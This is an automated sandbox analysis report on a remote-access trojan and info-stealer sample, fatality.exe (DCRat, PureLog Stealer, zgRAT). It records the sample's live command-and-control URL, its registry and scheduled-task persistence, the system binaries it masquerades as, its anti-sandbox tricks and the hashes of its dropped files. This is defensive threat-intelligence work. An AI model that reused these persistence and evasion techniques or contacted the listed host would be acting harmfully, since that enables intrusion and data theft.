                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2301749702.000000001B0FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2301749702.000000001B13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: containerReview.exe PID: 6536, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 2172, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 5624, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.containerReview.exe.780000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProgramData\dbg\containerReview.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.containerReview.exe.780000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProgramData\dbg\containerReview.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: containerReview.exe PID: 6536, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 2172, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 5624, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.containerReview.exe.780000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProgramData\dbg\containerReview.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.containerReview.exe.780000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProgramData\dbg\containerReview.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts241
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    Exploitation for Privilege Escalation                                    		1
                                    Disable or Modify Tools                                    		OS Credential Dumping3
                                    File and Directory Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts3
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory45
                                    System Information Discovery                                    		Remote Desktop ProtocolData from Removable Media1
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		11
                                    Process Injection                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager451
                                    Security Software Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive1
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCron21
                                    Registry Run Keys / Startup Folder                                    		1
                                    Scheduled Task/Job                                    		14
                                    Software Packing                                    		NTDS1
                                    Process Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                                    Registry Run Keys / Startup Folder                                    		1
                                    DLL Side-Loading                                    		LSA Secrets361
                                    Virtualization/Sandbox Evasion                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials1
                                    Application Window Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                                    Masquerading                                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job361
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589980 Sample: fatality.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 93 373292cm.nyashka.top 2->93 95 15.164.165.52.in-addr.arpa 2->95 97 Antivirus detection for dropped file 2->97 99 Antivirus / Scanner detection for submitted sample 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 12 other signatures 2->103 11 fatality.exe 3 6 2->11         started        15 mQBLhXIPAJ.exe 14 12 2->15         started        17 mQBLhXIPAJ.exe 2->17         started        19 4 other processes 2->19 signatures3 process4 file5 77 C:\blockcomSession\containerReview.exe, PE32 11->77 dropped 79 RezYUes00TmmVGwINj...2Ra62zGWDtewTBc.vbe, data 11->79 dropped 123 Detected unpacking (changes PE section rights) 11->123 125 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->125 127 Hides threads from debuggers 11->127 21 wscript.exe 1 11->21         started        81 C:\Users\user\Desktop\ucFnGTXv.log, PE32 15->81 dropped 83 C:\Users\user\Desktop\nCWNxMEA.log, PE32 15->83 dropped 85 C:\Users\user\Desktop\jPEOVQoM.log, PE32 15->85 dropped 87 4 other malicious files 15->87 dropped 129 Multi AV Scanner detection for dropped file 15->129 131 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->131 24 cmd.exe 15->24         started        signatures6 process7 signatures8 113 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->113 26 cmd.exe 1 21->26         started        28 conhost.exe 24->28         started        30 chcp.com 24->30         started        32 w32tm.exe 24->32         started        34 mQBLhXIPAJ.exe 24->34         started        process9 process10 36 containerReview.exe 7 35 26->36         started        40 conhost.exe 26->40         started        file11 69 C:\blockcomSession\mQBLhXIPAJ.exe, PE32 36->69 dropped 71 C:\Users\user\Desktop\yCQlabwB.log, PE32 36->71 dropped 73 C:\Users\user\Desktop\RUDRugHQ.log, PE32 36->73 dropped 75 10 other malicious files 36->75 dropped 115 Antivirus detection for dropped file 36->115 117 Multi AV Scanner detection for dropped file 36->117 119 Creates an undocumented autostart registry key 36->119 121 4 other signatures 36->121 42 cmd.exe 36->42         started        44 csc.exe 4 36->44         started        48 csc.exe 4 36->48         started        50 18 other processes 36->50 signatures12 process13 file14 52 containerReview.exe 42->52         started        55 conhost.exe 42->55         started        57 chcp.com 42->57         started        59 w32tm.exe 42->59         started        89 C:\Program Files (x86)\...\msedge.exe, PE32 44->89 dropped 133 Infects executable files (exe, dll, sys, html) 44->133 61 cvtres.exe 1 44->61         started        63 conhost.exe 44->63         started        91 C:\Windows\...\SecurityHealthSystray.exe, PE32 48->91 dropped 65 conhost.exe 48->65         started        67 cvtres.exe 1 48->67         started        signatures15 process16 signatures17 105 Antivirus detection for dropped file 52->105 107 Multi AV Scanner detection for dropped file 52->107 109 Machine Learning detection for dropped file 52->109 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 61->111

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    fatality.exe84%VirustotalBrowse
                                    fatality.exe71%ReversingLabsWin32.Trojan.DCRat
                                    fatality.exe100%AviraVBS/Runner.VPG
                                    fatality.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe100%AviraTR/Spy.Agent.cptjt
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe100%AviraTR/Spy.Agent.cptjt
                                    C:\Users\user\Desktop\RUDRugHQ.log100%AviraTR/PSW.Agent.qngqt
                                    C:\ProgramData\dbg\containerReview.exe100%AviraTR/Spy.Agent.cptjt
                                    C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\jPEOVQoM.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat100%AviraBAT/Delbat.C
                                    C:\blockcomSession\containerReview.exe100%AviraTR/Spy.Agent.cptjt
                                    C:\Users\user\Desktop\GgZbKUMi.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\HTJtRROP.log100%AviraTR/AVI.Agent.updqb
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe100%AviraTR/Spy.Agent.cptjt
                                    C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat100%AviraBAT/Delbat.C
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RUDRugHQ.log100%Joe Sandbox ML
                                    C:\ProgramData\dbg\containerReview.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\nCWNxMEA.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\jPEOVQoM.log100%Joe Sandbox ML
                                    C:\blockcomSession\containerReview.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RLUzQxgL.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\VquIdqjl.log100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\yCQlabwB.log100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\ProgramData\dbg\containerReview.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\Users\user\Desktop\GgZbKUMi.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\HTJtRROP.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\LTranRbW.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\PRRjZxCV.log25%ReversingLabs
                                    C:\Users\user\Desktop\RLUzQxgL.log8%ReversingLabs
                                    C:\Users\user\Desktop\RUDRugHQ.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\VquIdqjl.log8%ReversingLabs
                                    C:\Users\user\Desktop\eTDxNkzS.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\jPEOVQoM.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\nCWNxMEA.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\ucFnGTXv.log25%ReversingLabs
                                    C:\Users\user\Desktop\yCQlabwB.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\blockcomSession\containerReview.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                    C:\blockcomSession\mQBLhXIPAJ.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://373292cm.nyashka.top0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top/0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    373292cm.nyashka.top
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      15.164.165.52.in-addr.arpa
                                      		unknown
                                      		unknownfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://373292cm.nyashka.top/mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.enigmaprotector.com/fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpfalse
                                          		high
                                          http://373292cm.nyashka.topmQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecontainerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phpmQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.enigmaprotector.com/openUfatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              No contacted IP infos

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1589980
                                              Start date and time:2025-01-13 12:47:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:58
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:fatality.exe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.expl.evad.winEXE@58/46@10/0
                                              EGA Information:
                                              • Successful, ratio: 10%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 52.165.164.15, 4.245.163.56
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target containerReview.exe, PID 6536 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7200 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7216 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7368 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7696 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 2172 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 5624 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 7508 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 7600 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:48:24API Interceptor1x Sleep call for process: mQBLhXIPAJ.exe modified
                                              12:48:16Task SchedulerRun new task: mQBLhXIPAJ path: "C:\blockcomSession\mQBLhXIPAJ.exe"
                                              12:48:16Task SchedulerRun new task: mQBLhXIPAJm path: "C:\blockcomSession\mQBLhXIPAJ.exe"
                                              12:48:19Task SchedulerRun new task: containerReview path: "C:\blockcomSession\containerReview.exe"
                                              12:48:19Task SchedulerRun new task: containerReviewc path: "C:\blockcomSession\containerReview.exe"
                                              12:48:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                              12:48:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
                                              12:48:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                              12:48:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
                                              12:48:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                              12:49:00AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
                                              12:49:16AutostartRun: WinLogon Shell "C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe"
                                              12:49:24AutostartRun: WinLogon Shell "C:\blockcomSession\mQBLhXIPAJ.exe"
                                              12:49:32AutostartRun: WinLogon Shell "C:\Users\All Users\dbg\containerReview.exe"
                                              12:49:40AutostartRun: WinLogon Shell "C:\Users\Default\Templates\mQBLhXIPAJ.exe"
                                              12:49:49AutostartRun: WinLogon Shell "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                              12:49:57AutostartRun: WinLogon Shell "C:\blockcomSession\containerReview.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\Desktop\GgZbKUMi.logOneDriveStandaloneUpdater.exeGet hashmaliciousDCRatBrowse
                                                85D5ktqjpd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  VIyu4dC9CU.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    top.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      DC86.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        WinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              hz7DzW2Yop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                7aHY4r6vXR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                  Created / dropped Files

                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):1168
                                                                  Entropy (8bit):4.448520842480604
                                                                  Encrypted:false
                                                                  SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                  MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                  SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                  SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                  SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                  Malicious:false
                                                                  Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4608
                                                                  Entropy (8bit):3.9068031664580603
                                                                  Encrypted:false
                                                                  SSDEEP:48:6HmBthxZ8RxeOAkFJOcV4MKe28dsd4AWvqBHbuulB+hnqXSfbNtm:HexvxVx91vkNTkZzNt
                                                                  MD5:998E484FDD980EE25C6B31E000884188
                                                                  SHA1:F3D0E823C5093D4AFCCE7E3B00989B52B76F1A78
                                                                  SHA-256:72E9AC11A2B418ED2C2F73452961D8DB617767E6D84CA3E8CD4535EFC7F500BD
                                                                  SHA-512:43B026F710397167E4FFA57E3FCC9E8D7C236EF3F61454336FFE71D03E62D33ABD8D7170FE6D095A80BDA2F928F5CE2E46E55D4B367F59F8735607FBB6A2D2E7
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                  C:\Program Files\7-Zip\Lang\d81cfa058c78b8

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (364), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):364
